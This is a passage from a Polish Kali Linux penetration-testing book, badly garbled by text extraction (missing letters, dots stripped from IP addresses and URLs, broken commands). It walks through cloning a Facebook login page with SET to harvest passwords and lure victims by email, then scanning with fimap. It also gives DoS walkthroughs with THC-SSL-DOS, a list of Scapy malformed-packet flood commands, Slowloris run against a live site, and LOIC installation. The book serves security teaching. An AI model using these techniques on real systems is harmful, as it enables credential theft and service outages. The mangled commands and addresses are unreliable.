dokona za pomoc narz dzi takich jak ZAP

Przechwytywanie hase mdash pakiet SETW rozdziale 4 omoacutewili my pokroacutetce podstawowe mo liwo ci pakietu SET (ang Social Engi-neer Toolkit) W tym podrozdziale powroacutecimy do tego pakietu i skoncentrujemy si na zagad-nieniach zwi zanych z wykorzystywaniem go do gromadzenia hase dost pu oraz przechwy-tywania innych poufnych informacji

Jak pami tasz aby uruchomi pakiet SET powiniene w g oacutewnym menu systemu przej do gru-py Kali Linux a nast pnie wybra polecenie Exploitation ToolsSocial Engineering Toolsse-toolkit

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

250

Przed pierwszym uruchomieniem pakietu upewnij si e dokona e jego aktualizacji do najnow-szej wersji Szczegoacute ow instrukcj jak krok po kroku przeprowadzi aktualizacj pakietu SETznajdziesz w rozdziale 4

Kiedy pakiet SET zako czy klonowanie wybranej witryny internetowej mo e j uruchomi na w asnymserwerze WWW Bardzo wa nym elementem ataku jest przekonanie u ytkownika b d cego celem abypo czy si z kopi witryny dzia aj c na Twoim w asnym serwerze Oznacza to e do atakoacutew na celew internecie b dziesz musia u y maszyny posiadaj cej publiczny adres IP Oproacutecz tego b dziesz musiautworzy odpowiednie regu y dla zapory sieciowej tak aby zdalni u ytkownicy mogli si po czy z ze-wn trz z Twoim serwerem

Po zako czeniu konfiguracji ustawie adresoacutew IP i regu zapory sieciowej nadszed czas nauruchomienie pakietu SET

Tym razem pakietu SET b dziemy u ywa do przechwytywania i zbierania hase dost pu Jakpami tasz SET posiada mechanizmy pozwalaj ce na sklonowanie praktycznie dowolnie wybranejwitryny internetowej W naszym przyk adzie wykorzystamy pakiet SET do sklonowania witrynyjednego z najpopularniejszych serwisoacutew spo eczno ciowych Po uruchomieniu pakietu musisz za-akceptowa wszystkie warunki umowy licencyjnej tak jak zaprezentowano na rysunku na na-st pnej stronie

Po uruchomieniu pakietu SET warto od czasu do czasu wybra z menu g oacutewnego opcj 5) Update theSocial-Engineer Toolkit ktoacutera sprawdzi czy korzystasz z najnowszej wersji pakietu Je eli oka e si enie zostan zainstalowane odpowiednie aktualizacje Je eli po wybraniu tej opcji wy wietli si komuni-kat o b dzie informuj cy e repozytoria GIT nie istniej to prawdopodobnie pakiet GIT nie jest zainstalowa-ny lub zosta zainstalowany niepoprawnie (zawsze istnieje roacutewnie ryzyko e co si zmieni o w ca ejprocedurze od czasu kiedy powstawa a ta ksi ka) Wi cej szczegoacute owych informacji i wskazoacutewek na tematu ytkowania pakietu SET w systemie Kali Linux znajdziesz na blogach autoroacutew ksi ki Amira Lakhaniego(zobacz stron httpwwwDrChaoscom) lub Josepha Muniza (zobacz stron httpwwwthesecurity

bloggercom)

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

251

1 Gdy zako czy si aktualizacja pakietu SET do najnowszej wersji z menu g oacutewnegowybierz opcj 1) Social-Engineering Attacks

2 Teraz wybierz opcj 2) Website Attack Vectors 3 Wybierz opcj 3) Credential Harvester Attack Method

Do wyboru masz teraz kilka opcji okre laj cych sposoacuteb klonowania wybranej witryny PakietSET posiada swoje w asne wbudowane szablony dla popularnych witryn takich jak Facebookczy Gmail Czasami u ycie szablonu nie jest najlepszym rozwi zaniem aczkolwiek na pocz tekpowinno w zupe no ci wystarczy Je eli zamiast szablonu chcesz u y kopii wybranej witry-ny internetowej musisz poda jej adres URL mdash pakiet SET rozpocznie proces klonowania

Je eli posiadasz ju wykonan wcze niej kopi witryny lub samodzielnie utworzy e odpowiedniepliki HTML mo esz wybra opcj 3) Custom Import Po wybraniu tej opcji b dziesz moacutegwskaza lokalizacj plikoacutew HTML ktoacuterych chcesz u y

W naszym przyk adzie u yjemy gotowych szablonoacutew witryn internetowych Pakiet SET poprosio podanie adresu IP na ktoacuterym b dzie nas uchiwa nadchodz cych da mdash w tym przypadkub dzie to adres IP interfejsu sieciowego naszego systemu Kali Linux Wyj tkiem od tej regu ymo e by sytuacja kiedy wykorzystujesz us ug NAT zapory sieciowej W takim przypadkuzamiast lokalnego adresu IP systemu Kali Linux powiniene u y publicznego adresu IP hostaus ugi NAT tak aby klienty z zewn trz mog y czy si z Twoim systemem W naszym przy-k adzie u yjemy adresu IP interfejsu p tli zwrotnej 127001

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

252

Kiedy zdefiniujesz adres IP pakiet SET poprosi Ci o wybranie szablonu W naszym przy-padku wybierzemy opcj Facebook

Na kolejnym rysunku przedstawiono okno przegl darki po czonej z serwerem o adresie127001 i wy wietlaj cej nasz fa szyw stron portalu Facebook Je eli wy wietlona stronanie wygl da przekonuj co mo esz u y innego szablonu albo po prostu sklonowa aktualnwersj danej strony

Zwroacute uwag e w pasku adresu przegl darki wy wietlany jest adres 127001 W wi kszo ciprzypadkoacutew b dziesz musia jednak u y nieco bardziej wyrafinowanych wektoroacutew atakuaby przekona u ytkownikoacutew do odwiedzenia Twojej spreparowanej strony internetowejMo esz to zrobi na wiele sposoboacutew na przyk ad poprzez rozsy anie do u ytkownikoacutew pocztelektroniczn specjalnie przygotowanej wiadomo ci zawieraj cej cze do Twojej spreparowanejwitryny internetowej (zobacz pierwszy rysunek na nast pnej stronie)

Kiedy u ytkownik rozpocznie wpisywanie nazwy konta i has a dost pu na naszej fa szywejstronie udaj cej witryn Facebook pakiet SET przechwyci ca y zwi zany z tym ruch sieciowyi nast pnie przekieruje u ytkownika do prawdziwej witryny internetowej Istnieje bardzo du-a szansa na to e po takim przekierowaniu u ytkownik b dzie przekonany e po prostu po-

myli si podczas wpisywania has a i zaloguje si jeszcze raz nie maj c wiadomo ci e bdquopodrodzerdquo pakiet SET przechwyci nazw jego konta i has o dost pu (zobacz drugi rysunek nanast pnej stronie)

Jak wida na powy szym rysunku pakiet SET przechwyci nazw naszego konta u ytkownikaDrChaos i nasze has o dost pu ILoveKali

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

253

Po zako czeniu tego wiczenia u yj kombinacji klawiszy Ctrl+C aby zako czy prac programuSET i wygenerowa raport w formacie HTML SET generuje profesjonalnie wygl daj cy ra-port ktoacuterego mo esz z powodzeniem u y podczas tworzenia raportu ko cowego z przepro-wadzonego testu penetracyjnego

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

254

Fimap

Fimap to narz dzie napisane w j zyku Python przeznaczone do wyszukiwania i wykorzysty-wania podatno ci i luk w zabezpieczeniach aplikacji internetowych pozwalaj cych na przeprowa-dzanie atakoacutew typu LFI (ang Local File Inclusion) lub RFI (ang Remote File Inclusion)

Aby uruchomi pakiet Fimap w systemie Kali Linux przejd do grupy Kali Linux a nast pniewybierz polecenie Web ApplicationsWeb Vulnerability Scannersfimap Po wybraniu tegopolecenia na ekranie pojawi si nowe okno terminala z wy wietlonym ekranem powitalnympolecenia fimap Dla pakietu fimap istnieje roacutewnie kilka dodatkowych wtyczek ktoacutere mo eszpobra z internetu i zainstalowa za pomoc nast puj cego polecenia

fimap --install -plugins

Dost pne wtyczki zostan wy wietlone w formie listy z opcj pozwalaj c na zainstalowaniewybranej wtyczki lub zako czenie dzia ania polecenia Jak wida w naszym przyk adzie do-st pne s dwie dodatkowe wtyczki st d polecenie instalowania musimy wykona dwukrotnieindywidualnie instaluj c poszczegoacutelne wtyczki (zobacz pierwszy rysunek na nast pnej stronie)

Aby u y pakietu Fimap musisz najpierw poda adres URL witryny ktoacutera b dzie celem skaneraIstnieje wiele metod definiowania adresoacutew URL Mo esz na przyk ad poda jeden wybrany adresURL ca list adresoacutew URL mo esz u y wyszukiwarki Google do zebrania adresoacutew URL

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

255

ale roacutewnie dobrze mo esz u y innych metod takich jak zbieranie wszystkich adresoacutew URLz hiper czy zamieszczonych na danej stronie internetowej czy pozyskiwanie adresoacutew URL z for-mularzy i nag oacutewkoacutew stron W naszym przypadku celem skanera b dzie witryna httpwwwthesecuritybloggercom

Aby uruchomi skanowanie witryny httpwwwthesecuritybloggercom powiniene wpisanast puj ce polecenie

fimap -u httpwwwthesecuritybloggercom

Pakiet Fimap rozpocznie skanowanie i sproacutebuje automatycznie wykry podatno ci na atakitypu LFIRFI Na rysunku przedstawionym poni ej wida jednak e witryna wwwthesecurity

bloggercom jest odporna na tego typu ataki

Ataki typu DoSW zdecydowanej wi kszo ci przypadkoacutew celem przeprowadzania testoacutew penetracyjnych jestidentyfikacja potencjalnych i rzeczywistych podatno ci i luk w zabezpieczeniach bez umy l-nego zak oacutecania dzia ania atakowanego systemu i bez robienia mu krzywdy w jakikolwiek in-ny sposoacuteb Jest to kluczowy element odroacute niaj cy autoryzowanego pentestera od z o liwegonapastnika maj cego niecne zamiary Prawdziwy napastnik nie przestrzega adnych regu

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

256

i nie zwraca uwagi na to czy jego dzia ania spowoduj zak oacutecenia w funkcjonowaniu atako-wanego systemu je eli tylko takie post powanie b dzie dla niego korzystne Czasami zdarzasi nawet e napastnik b dzie wr cz za wszelk cen szuka mo liwo ci zak oacutecenia dzia aniaczy nawet ca kowitego wy czenia atakowanego systemu Z tego powodu w niektoacuterych przypad-kach przeprowadzenie testoacutew odporno ci danej witryny czy aplikacji internetowej na ataki typuDoS (ang Denial of Service) mo e by bardzo po dane Testy tego rodzaju cz sto s nazywanetestami warunkoacutew skrajnych lub testami odporno ci na przeci enie systemu (ang stress testing)

Jedn z najwa niejszych spraw zwi zanych z testami odporno ci na ataki typu DoS jest bezwzgl dne uzyska-nie pisemnej zgody w a ciciela systemu na przeprowadzanie takich atakoacutew Niektoacutere metody atakoacutewmog mie negatywny wp yw na funkcjonowanie systemu nawet po zako czeniu testoacutew Dobrym roz-wi zaniem jest przeprowadzanie takich testoacutew na systemach z redundancj systemach nieprodukcyj-nych czy systemach zainstalowanych w rodowisku laboratoryjnym o ile to oczywi cie mo liwe

Najcz ciej spotykana metoda ataku DoS polega na bdquozalewaniurdquo badanego systemu masowonap ywaj cymi z zewn trz daniami Takie przeci enie zazwyczaj skutecznie uniemo liwiasystemowi odpowiadanie na rzeczywiste dania od autoryzowanych klientoacutew lub co najmniejtak spowalnia wysy anie odpowiedzi e ca y system staje si dla klientoacutew praktycznie bezu-yteczny Ataki typu DoS mog by skierowane na zasoby systemu (np przypisana przestrze

dyskowa przepustowo po cze sieciowych itd) konfiguracj systemu (np usuwanie tablicroutingu) informacje o stanie systemu (np resetowanie sesji TCP) oraz ka dy inny elementrodowiska systemu ktoacuterego przeci enie mo e spowodowa zak oacutecenie jego normalnego

funkcjonowania

Roacute nica pomi dzy atakami DoS (ang Denial of Service) a DDoS (ang Distributed Denial of Service) polega natym e do przeprowadzania ataku DoS napastnik wykorzystuje tylko jeden komputer podczas gdy w przy-padku atakoacutew DDoS liczba maszyn bior cych udzia w ataku mo e si ga tysi cy Omawianie zagadniezwi zanych z atakami DDoS wykracza niestety daleko poza ramy naszej ksi ki

Istniej cztery g oacutewne kategorie atakoacutew DoSDDoS Ataki wykorzystuj ce przeci enie po cze sieciowych (ang Volume Based

Attacks) mdash taki rodzaj ataku jest zwi zany z bdquozalewaniemrdquo atakowanego systemumasowo nap ywaj cymi pakietami UDP ICMP i innymi Celem takiego ataku jestprzeci enie po cze sieciowych atakowanego systemu nadmiernymi ilo ciamiprzesy anych pakietoacutew

Ataki na protoko y komunikacyjne (ang Protocol Attacks) mdash ataki te maj na celunadmierne wykorzystywanie zasoboacutew urz dze sieciowych takich jak routeryzapory sieciowe urz dzenia roacutewnowa ce obci enie po cze sieciowychPrzyk adami atakoacutew na protoko y komunikacyjne s ataki typu SYN floodPing of Death Smurf Teardrop wymuszanie fragmentacji pakietoacutew itp

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

257

Ataki na warstw aplikacji (ang Application Layer Attacks) mdash takie ataki wykorzystujnormalny ruch sieciowy do zak oacutecenia dzia ania lub nawet spowodowania awariidanej witryny lub aplikacji internetowej Przyk adami mog by ataki typu Zero-Dayczy ataki wykorzystuj ce inne podatno ci i luki w zabezpieczeniach witryn i aplikacjiinternetowych

Ataki powoduj ce wyczerpanie zasoboacutew sesji (ang Session Exhaustion) mdash takieataki powoduj wyczerpanie liczby dozwolonych jednocze nie sesji poprzez ci g enawi zywanie nowych po cze bez zamykania starych sesji co prowadzido wyczerpania zasoboacutew systemu

W systemie Kali Linux znajdziesz wiele narz dzi pozwalaj cych na wykorzystywanie podat-no ci i luk w zabezpieczeniach Narz dzia te na przyk ad Metasploit mog by u ywane doprzeprowadzania atakoacutew DoS na warstw aplikacji (wiele z tych narz dzi omawiali my ju wewcze niejszych rozdzia ach) W rozdziale 3 prezentowali my popularne narz dzie Scapypozwalaj ce na przeprowadzanie atakoacutew DoS na protoko y komunikacyjne Poni ej znaj-dziesz omoacutewienie kilku kolejnych narz dzi s u cych do przeprowadzania atakoacutew DoS ktoacuteremo esz znale w systemie Kali Linux

Aby przetestowa skuteczno ataku DoS mo esz u y witryny httpwwwupordownorg ktoacutera sprawdzadost pno podanej witryny internetowej

THX-SSL-DOSProtokoacute SSL (ang Secure Socket Layer) jest u ywany do nawi zywania bezpiecznych po -cze i transakcji w internecie Nawi zanie bezpiecznego po czenia z wykorzystaniem proto-ko u SSL wymaga u ycia po stronie serwera 15 razy wi kszej mocy obliczeniowej ni po stro-nie klienta Atak typu THC-SSL-DOS wykorzystuje t dysproporcj przez proacuteb prze adowaniaserwera spreparowanymi daniami nawi zania sesji SSL a do momentu kiedy przeci onyserwer si poddaje i przestaje odpowiada na dania przesy ane od innych autoryzowanychklientoacutew Atak wykorzystuje mechanizm renegocjacji bezpiecznego po czenia SSL do gene-rowania tysi cy takich da dla pojedynczego po czenia TCP Z tego powodu atak ten jestroacutewnie znany jako atak typu SSL-Exhaustion (ang mdash bdquowyczerpanie zasoboacutew SSLrdquo) Zalettakiego podej cia jest to e mo liwo ci przetwarzania da nawi zania sesji SSL s znaczniewy sze po stronie klienta co oznacza e przeci tny laptop pod czony do sieci za po red-nictwem cza o przeci tnej szybko ci mo e rzuci powa ne wyzwanie niemal ka demu serwero-wi aplikacji internetowych Podatno serweroacutew internetowych na ataki typu SSL-Exhaustionjest powszechnie znana a mimo to nie uda o si jeszcze opracowa skutecznej metody zapo-biegania takim atakom

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

258

Aby uruchomi pakiet THC-SSL-DOS w menu g oacutewnym systemu przejd do grupy Kali Linuxa nast pnie wybierz polecenie Stress TestingWeb Stress Testingthc-ssl-dos Po wybraniu pole-cenia pojawi si nowe okno terminala z ekranem powitalnym polecenia thc-ssl-dos Sk adniapolecenia jest nast puj ca

thc-ssl-dos [opcje] ltadres IP ofiarygt ltportgt and --accept

W wierszu wywo ania polecenia musisz umie ci opcj --accept w przeciwnym wypadku otrzymaszkomunikat o b dzie przedstawiony poni ej

Po uruchomieniu programu THC-SSL-DOS zobaczysz na ekranie kilka zabawnych komuni-katoacutew informuj cych e dzia anie programu si rozpocz o Na pierwszym rysunku zamiesz-czonym poni ej wida e zaatakowana witryna nie obs uguje protoko u SSL st d programwy wietla na ekranie komunikat o wyst pieniu b du Na kolejnym rysunku przedstawionosytuacj w ktoacuterej pomy lnie rozpocz si proces renegocjacji sesji SSL co w efekcie mo edoprowadzi do zak oacutecenia dzia ania atakowanego systemu Pami taj ataki tego typu mo eszprzeprowadza tylko na systemach dla ktoacuterych uzyska e pisemne zezwolenie w a cicielaPrzeprowadzenie takiego ataku mo e doprowadzi do powa nego ograniczenia funkcjonalno-ci atakowanego systemu lub nawet do jego ca kowitego za amania

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

259

ScapyJednym z najpopularniejszych narz dzi s u cych do przeprowadzania atakoacutew typu DoS jestScapy Program zosta napisany w j zyku Python a jego autorem jest Phillippe Biondi Scapypozwala na tworzenie modyfikowanie i dekodowanie zawarto ci pakietoacutew sieciowych wstrzyki-wanie pakietoacutew do sieci przechwytywanie pakietoacutew oraz dopasowywanie da i odpowiedziProgram posiada roacutewnie wiele innych mechanizmoacutew takich jak skanowanie portoacutew traso-wanie pakietoacutew sprawdzanie urz dze sieciowych przeprowadzanie atakoacutew czy wykrywanieurz dze sieciowych

Jedn z cz sto wykonywanych operacji jest przechwytywanie pakietoacutew TCP i wysy anie ichdalej do sieci za po rednictwem programu Scapy Aby uruchomi ten program w oknie ter-minala wpisz polecenie scapy Po uruchomieniu programu b dziesz moacuteg wykonywa pole-cenia bezpo rednio z jego wiersza polece

W przyk adzie ktoacutery przedstawiamy poni ej sproacutebujemy u y pakietu Scapy do wysy aniaspreparowanych pakietoacutew TCP do naszego serwera testowego W naszym przypadku serwertestowy ma adres IP 10001 ale w realnym scenariuszu mo e to by dowolny router czyserwer WWW Oproacutecz podania adresu atakowanego serwera musimy roacutewnie okre li liczbpakietoacutew ktoacutere zostan wys ane do celu W naszym przypadku b dzie to 2000 pakietoacutew cze-go mo emy dokona za pomoc nast puj cego polecenia

send(IP(dst=10001ttl=0)TCP()iface=eth0count=2000)

Powoduje ono wys anie 2000 pakietoacutew z interfejsu sieciowego eth0 do serwera o adresie10001 Jak zapewne zauwa y e czas ycia wysy anych pakietoacutew (parametr ttl) jest ustawio-ny na warto 0 Z punktu widzenia protoko u TCP istnienie takich pakietoacutew jest niemo liweInaczej moacutewi c wysy aj c pakiety z tak spreparowan warto ci parametru ttl proacutebujemywprowadzi atakowany serwer internetowy co najmniej w zak opotanie W realnym scenariu-szu potencjalny napastnik wysy a by do atakowanego serwera miliony takich pakietoacutew Wartozauwa y e w sprzyjaj cych okoliczno ciach zak oacutecenie pracy czy nawet powa na awaria serweramo e by spowodowana odebraniem nawet jednego niepoprawnego czy specjalnie z o liwiespreparowanego pakietu sieciowego Oczywi cie w zale no ci od zamiaroacutew mo esz dowolniemodyfikowa poszczegoacutelne opcje wysy ania pakietoacutew

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

260

Poni ej przedstawiamy kilkana cie popularnych scenariuszy atakoacutew przeprowadzanych przyu yciu pakietu Scapy

Nieprawid owa wersja protoko u IP

send(IP(dst=10001 src=10203040 version=0) TCP(dport=www) iface=eth0 count=2000)

Nieprawid owa suma kontrolna pakietu TCP

send(IP(dst=10001)TCP(chksum=0x5555)iface=eth0count=2000)

Nieprawid owe flagi pakietu TCP (wszystkie flagi wyzerowane i numer sekwencji usta-wiony na 0)

send(IP(dst=10001)TCP(flags=seq=555)iface=eth0 count=2000)

Nieprawid owe flagi pakietu TCP (wszystkie flagi ustawione jednocze nie)

send(IP(dst=10001)TCP(flags=0x0ff)iface=eth0count=2000)

Ustawiona tylko flaga FIN

send(IP(dst=10001)TCP(flags=F)iface=eth0count=2000)

Rozmiar nag oacutewka wi kszy od rozmiaru pakietu L2

send(IP(dst=10001 src=10203040 ihl=15L)TCP(dport=www) iface=eth0 count=2000)

Zbyt ma y rozmiar nag oacutewka pakietu

send(IP(dst=10001 src=10203040 ihl=2L)TCP(dport=www) iface=eth0 count=2000)

ICMP Flood

send(IP(dst=10001)ICMP()iface=eth0count=2000)

Nieprawid owa suma kontrolna pakietu IP

send(IP(dst=10001 src=10203040 chksum=0x5500) TCP(dport=www) iface=eth0 count=2000)

Fragmentacja pakietoacutew IP

send(IP(dst=10001 src=10203040 frag=1)TCP(dport=www) iface=eth0 count=2000)

Rozmiar pakietu IP wi kszy ni rozmiar pakietu warstwy L2

send(IP(dst=10001 src=10203040 ihl=5L len=80) TCP(dport=www) iface=eth0 count=2000)

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

261

roacuted owy adres IP taki sam jak docelowy adres IP

send(IP(dst=10001 src=10001)TCP(dport=www) iface=eth0 count=2000)

Rozmiar pakietu warstwy L2 wi kszy ni rozmiar pakietu IPsend(IP(dst=10001len=32) Raw(load=bla-bla-bla-bla-bla-blabla-bla)iface=eth0count=2000)send(IP(dst=10001len=32)UDP(dport=80len=48) Raw(load=bla-bla-bla-bla-bla-bla-bla-bla)iface=eth0count=2000)send(IP(dst=10001len=32)ICMP() Raw(load=bla-bla-bla-blabla-bla-bla-bla)iface=eth0count=2000)

Brak pakietu warstwy L4

send(IP(dst=10001 src=10203040) iface=eth0 count=2000)

Jednocze nie ustawione flagi SYN i FIN

send(IP(dst=10001)TCP(flags=FS)iface=eth0count=2000)

Rozmiar nag oacutewka pakietu TCP wi kszy ni rozmiar pakietu warstwy L2

send(IP(dst=10001 src=10203040) TCP(dport=www dataofs=15L) iface=eth0 count=2000)

Zbyt ma y rozmiar nag oacutewka TCP (mniejszy ni 5 bajtoacutew)

send(IP(dst=10001 src=10203040) TCP(dport=www dataofs=1L) iface=eth0 count=2000)

Slowloris

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

262

Slowloris to klient HTTP ktoacutery umo liwia przeprowadzanie atakoacutew typu DoS nawet za po-rednictwem cza o wzgl dnie ma ej przepustowo ci Metoda ataku wykorzystywana w tym

programie jest unikatowa i pozwala na przeprowadzenie skutecznego ataku bez uciekania sido powszechnie wykorzystywanych technik bdquozalewaniardquo serweroacutew masowo wysy anymi pa-kietami Slowloris otwiera wiele roacutewnoleg ych po cze do atakowanego serwera i podtrzy-muje je w otwartym stanie poprzez przesy anie cz ciowych da HTTP Po otwarciu po -czenia program cyklicznie w regularnych odst pach czasu przesy a do serwera setkikolejnych nag oacutewkoacutew da co zapobiega zamkni ciu po czenia przez serwer Takie zacho-wanie powoduje wyczerpanie limitu roacutewnoleg ych sesji serwera co w efekcie uniemo liwiajego normalne dzia anie W przypadku witryn sieciowych przystosowanych do du ego nat -enia ruchu proces przejmowania kolejnych po cze przez pakiet Slowloris mo e zaj nieco

czasu poniewa inni u ytkownicy musz zwalnia swoje po czenia zanim b d one mog yzosta zaj te przez Slowloris Nie zmienia to jednak w niczym faktu e po pewnym czasieSlowloris poma u ale skutecznie przechwyci wszystkie dost pne sesje i doprowadzi do za-wieszenia dzia ania serwera

Program Slowloris dzia a skutecznie zw aszcza w odniesieniu do serweroacutew WWW wykorzy-stuj cych przetwarzanie wielow tkowe ktoacutere s z definicji wra liwe na ograniczanie liczby do-st pnych w tkoacutew Przyk adami takich serweroacutew s Apache 1x i 2x dhttpd GoAhead i inne

Pakiet Slowloris nie jest domy lnie instalowany w systemie Kali Linux 10 ale mo esz go pobra ze stronyhttphackersorgslowloris

Aby uruchomi program pobierz skrypt pl ze strony autora otwoacuterz nowe okno terminalaprzejd do katalogu ze skryptem i wykonaj polecenie przedstawione poni ej

perl slowlorispl

W oknie terminala pojawi si ekran pomocy programu Aby rozpocz atak na wybrany serwerpowiniene wpisa polecenie przedstawione powy ej i doda opcj -dns a po niej wpisa adresserwera b d cego celem ataku Aby zaatakowa na przyk ad witryn wwwthesecuritybloggercompowiniene wpisa nast puj ce polecenie (zobacz pierwszy rysunek na nast pnej stronie)

perl slowlorispl -dns thesecuritybloggercom

Po rozpocz ciu ataku b dziesz moacuteg obserwowa w oknie terminala proces przejmowaniakolejnych po cze co po pewnym czasie mo e doprowadzi do za amania si atakowanegosystemu (zobacz drugi rysunek na nast pnej stronie)

Je eli atak przeprowadzany za pomoc pakietu Slowloris si powiedzie atakowany serwerprzestanie odpowiada na dania (zobacz trzeci rysunek na nast pnej stronie)

Powy ej mo esz zobaczy skutki ataku DoS na witryn httpwwwthesecuritybloggercom (prosimy niepowtarzaj tego eksperymentu)

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

263

LOIC czyli Niskoorbitalne Dzia o JonowehellipPakiet LOIC (ang Low Orbit Ion Cannon czyli wspomniane w tytule podrozdzia u Niskoorbital-ne Dzia o Jonowe) to narz dzie do badania odporno ci zasoboacutew sieciowych na przeci enieLOIC pozwala na sprawdzanie ilo ci ruchu sieciowego jaki mo e obs u y dany system Ta-kie informacje mog by poacute niej wykorzystywane do planowania rozbudowy i wdra ania sze-rokopasmowych po cze sieciowych Program ten sta si inspiracj do utworzenia innych

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

264

narz dzi o podobnej funkcjonalno ci takich jak na przyk ad JavaScript LOIC ktoacutere pozwalau ytkownikowi na przeprowadzanie testoacutew odporno ci na przeci enia po cze bezpo red-nio z poziomu przegl darki

Program LOIC by wykorzystywany przez grup Anonymous do przeprowadzenia s ynnychatakoacutew na wiele znanych internetowych witryn publicznych i rz dowych Niektoacuterzy prawnicyusi uj co prawda przekonywa e zastosowanie narz dzi takich jak LOIC jest w praktycebardzo podobne do odwiedzania danej witryny kilka tysi cy razy ale w wi kszo ci krajoacutewnieautoryzowane u ywanie tego typu narz dzi jest traktowane jako amanie prawa

Aby zainstalowa pakiet LOIC powiniene otworzy okno terminala i wpisa sekwencj po-lece przedstawion poni ej

apt-get updateaptitude install git-core monodevelopapt-get install mono-gmcs

Po zako czeniu tego etapu wykonaj polecenie cd Desktop aby przej do katalogu reprezentuj -cego pulpit a nast pnie utwoacuterz w nim podkatalog o nazwie loic Mo esz to zrobi za pomocpolecenia przedstawionego poni ej

mkdir loic

Przejd do nowo utworzonego katalogu za pomoc polecenia cd loic i wykonaj polecenieprzedstawione poni ej

wget httpsrawgithubcomnicolargoloicinstaller masterloicsh

Nast pnie nadaj skryptowi loicsh odpowiednie uprawnienia Aby to zrobi wykonaj kolejnepolecenie

chmod 777 loicsh

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

265

Ostatnim etapem jest uruchomienie skryptu za pomoc polecenia przedstawionego poni ej

loicsh install

Je eli na ekranie nie pojawi si aden komunikat o wyst pieniu b du to znaczy e jestegotowy do przeprowadzenia aktualizacji naszego bdquodzia a jonowegordquo Aby to zrobi wykonajnast puj ce polecenie

loicsh update

Po zako czeniu aktualizacji nadszed czas na uruchomienie programu LOIC Mo esz to zro-bi wpisuj c w oknie terminala nast puj ce polecenie

loicsh run

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

266

U ywanie programu LOIC nie jest trudne Na pocz tek mo esz wybra czy chcesz korzystaz trybu r cznego (ang manual mode) czy trybu IRC (ang IRC mode) W naszym przyk adziewybrali my tryb r czny

Nast pnie powiniene poda adres URL systemu ktoacutery chcesz zaatakowa W naszym przypadkuwpisali my adres lokalnego interfejsu p tli zwrotnej czyli 127001 Je eli chcesz zmodyfi-kowa domy lne ustawienia ataku LOIC oferuje wiele opcji dla protoko oacutew TCP oraz UDP

Kiedy b dziesz gotowy do rozpocz cia ataku powiniene klikn przycisk IMMA CHARGINMAH LAZER Post py ataku mo esz obserwowa w oknie programu Aby zatrzyma atakkliknij przycisk Stop Flooding

Inne narz dziaKali Linux oferuje inne narz dzia ktoacutere mo esz wykorzysta do przeprowadzania atakoacutew naaplikacje internetowe Poni ej zamieszczamy kroacutetkie zestawienie wybranych narz dzi ktoacuterenie by y do tej pory omawiane

DNSChef

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

267

Pakiet DNSChef to serwer DNS proxy przeznaczony dla pentesteroacutew i specjalistoacutew zajmuj -cych si analiz z o liwego oprogramowania Serwery DNS proxy to narz dzia bdquofa szuj cerdquoodpowiedzi DNS wykorzystywane do analizy ruchu sieciowego generowanego przez aplika-cje internetowe i wielu innych zastosowa DNS (ang Domain Name System) to rozproszonysystem przydzielania nazw zasoboacutew sieciowych takich jak komputery serwery us ugi siecio-we i inne zasoby sieciowe pod czone do internetu lub prywatnych sieci komputerowychCelowe dostarczanie fa szywych adresoacutew DNS mo e powodowa przekierowanie ruchu sie-ciowego do lokalizacji zupe nie innych ni oryginalne

Na przyk ad serwer DNS proxy mo e by wykorzystywany do utworzenia fa szywych odpo-wiedzi DNS powoduj cych e ruch dedykowany dla witryny CzarnyCharaktercom zamiastdo internetu b dzie trafia do lokalnego komputera analityka gdzie mo e by blokowany lubprzechwytywany w celu przeprowadzenia dok adniejszej analizy Aby to zrobi musisz uzy-ska dost p do jednego z serweroacutew DNS i odpowiednio zmodyfikowa wpisy DNS lub doko-na bdquozatruciardquo serwera DNS tak aby ruch sieciowy by przekierowywany do Twojego kom-putera z systemem Kali Linux Sama obs uga narz dzia DNSChef nie jest skomplikowanaaczkolwiek prawdziwym wyzwaniem mo e by atak na serwer DNS i przekierowanie ruchudo Twojego komputera

SniffJoke

SniffJoke pozwala na zupe nie przezroczyste przechwytywanie po cze TCP wprowadzaniedo nich opoacute nie modyfikowanie zawarto ci pakietoacutew oraz wstrzykiwanie fa szywych spre-parowanych pakietoacutew do sesji TCP u ytkownika Powoduje to e pasywne rozwi zania mo-nitoruj ce i zabezpieczaj ce ruch sieciowy takie jak systemy IDSIPS i sniffery maj du eproblemy z poprawn interpretacj po cze sieciowych Dzia anie programu wywo uje roacute -nice mi dzy ruchem sieciowym ktoacutery jest przechwytywany i przewidywany przez sniffera rzeczywistym ruchem sieciowym generowanym przez klienta w rezultacie czego algorytmybuduj ce bdquokonwersacjerdquo sieciowe dla sniffera maj problemy z poprawnym sk adaniem kolej-no ci pakietoacutew Na kolejnych dwoacutech rysunkach przedstawiamy proces przechwytywania ru-chu sieciowego mi dzy dwoma u ytkownikami bez udzia u pakietu SniffJoke oraz w sytuacjikiedy pakiet SniffJoke dzia a

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

268

